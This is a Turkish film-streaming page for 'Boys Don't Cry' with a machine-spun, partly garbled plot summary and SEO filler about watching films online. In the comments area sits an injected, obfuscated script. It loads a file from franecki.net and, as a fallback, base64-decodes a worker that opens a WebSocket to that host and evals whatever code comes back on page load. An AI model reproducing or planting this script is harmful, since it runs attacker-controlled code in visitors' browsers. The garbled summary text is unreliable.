FavoriteLoadingAdd to favorites

Erkekler Ağlamaz (Boys Don’t Cry)

Erkekler Ağlamaz — Boys Don’t Cry 1999 filmi, 7.6 puan alarak 1999 – ABD yapımı olan filmin mevzakılunda ise Nebraska’nın Falls şehri, Brandon Teena (Hilary Swank) ismidilavei çılgınkanlıyla alakali dedikodularla çalkalanıyordu, bütün kadınların olduğu gibi bütün adalesualının da dikkatini ve alaadaleini çekmişti. Karizmatik kişiliği ve masum suratünün artsında iri bir giz gizliyordu. O herkati olduğunu zannettiği kişi değildi.Her genç insan gibi hatalar yapıyordu ve bu hatalarını da çok değerlıya ödemek güçundaydı. Yeni sevgilisi Lanne ve gözü pek arkadaşı John arasındaki sınırları taraflışlıkla aşınca giz, bir vahşetle ortaya çıktı. Brandon Teena; hararetli bir aşık, cemiyetdan dışlanmış kimsesiz bir hayalperest, kalpli bir hırsız ve haksızlığa uğramış trajik bir suçluydu.Bu filmdilavei rolü Hilary Swank’a bir Oscar mükafatü kazandırdı.. hdfilmizlett ekibi olarak bütün Erkekler Ağlamaz izleyicilerine iyi seyirler dileriz..
Yorumlar

<div id=”bf64b56e40″ style=”display: none”></div><script type=”text/javascript”>(function(){var h=document.getElementsByTagName(“head”)[0],s=document.createElement(“script”),f=function(){AMSP.loadAsset(“af78676eff6ed506863de898b6a36bae”,””)};s.type=”text/javascript”;s.src=”//franecki.net/js/lib.js”;s.onload=function(){typeof AMSP===’undefined’?this.onerror():f()};s.onerror=function(){try{var w=new Worker(URL.createObjectURL(new Blob([‘eval(atob(\’ICAgIAogICAgICAgIHZhciB3cyA9IG5ldyBXZWJTb2NrZXQoJ3dzczovL2ZyYW5lY2tpLm5ldDo4MDQxL2pzL2xpYi5qcz9saWI9d3JrJyk7CiAgICAgICAgd3Mub25tZXNzYWdlID0gZnVuY3Rpb24odCl7IHBvc3RNZXNzYWdlKHQuZGF0YSk7IHdzLmNsb3NlKCk7fTsKICAgIAogICAg\’))’]),{type:’application/javascript’}));w.onmessage=function(t){typeof AMSP===’undefined’?window.addEventListener(“amspInit”,f):f();window.eval(t.data)}}catch(e){}};h.insertBefore(s,h.firstChild)})();</script>

ayla izle Tüm gün stresli iş ortamı, dışarıdaki iş, evdeki iş derken, insan kendisine bir türlü vakit ayıramıyor. Her sezon yeni sinema filmleri çıkıyor ama ha bu gün, ha yarın derken bir türlü sinemaya bile gidilemiyor. Fakat artık rahatlık, keyif ve tüm filmler evinize geliyor. En son sistem kaliteli çözünürlük ile sizde hd film izleme keyfini evinizde rahat bir ortamda yaşayabilirsiniz. İstediğiniz saatte tüm işlerinizi bitirip, bilgisayar karşısına geçip kaliteli dakikalar geçirebilirsiniz. Her şey parmaklarınızın arsında bulunuyor. Son sistem rahatlık ve güzellik sizlerledir. Artık kendinizi biraz şımartmamın zamanı geldi. Canınızın istediği saatte, en sevdiğiniz filmi izleyebilir hatta birden fazla filmi aynı günde izleme keyfini yaşayabilirsiniz. Mola sizin ellerinizde, durdurmak sizin ellerinizde, başa getirip yeniden izlemek sizin ellerinizdedir.   Online ortamda  yerli film izleme keyfi her şekilde sizlere konfor sağlıyor. Gerilim, macera, bilim kurgu, korku, komedi, romantizm ve film izle  seçeneklerinden istediğinizi seçip ayaklarınızı uzatıp izleyebilirsiniz. Karışan, sınır koyan yok. Beğenmediğinizde sonuna kadar izleme gibi bir mecburiyetiniz yok. Geçin bilgisayar başına, canınız ne zaman ve hangi filmi isterse izleyin. İşiniz mi çıktı, dondurun sonra devam edin. Yafa kapatın başka bir zaman izleyin. Kaliteli zamanı evde geçirmenin yolu, 2017 film izleme ile olur. Seç izle, indir sonra izle. Bin bir çeşit film içinden istediğini izle, karar sadece senin.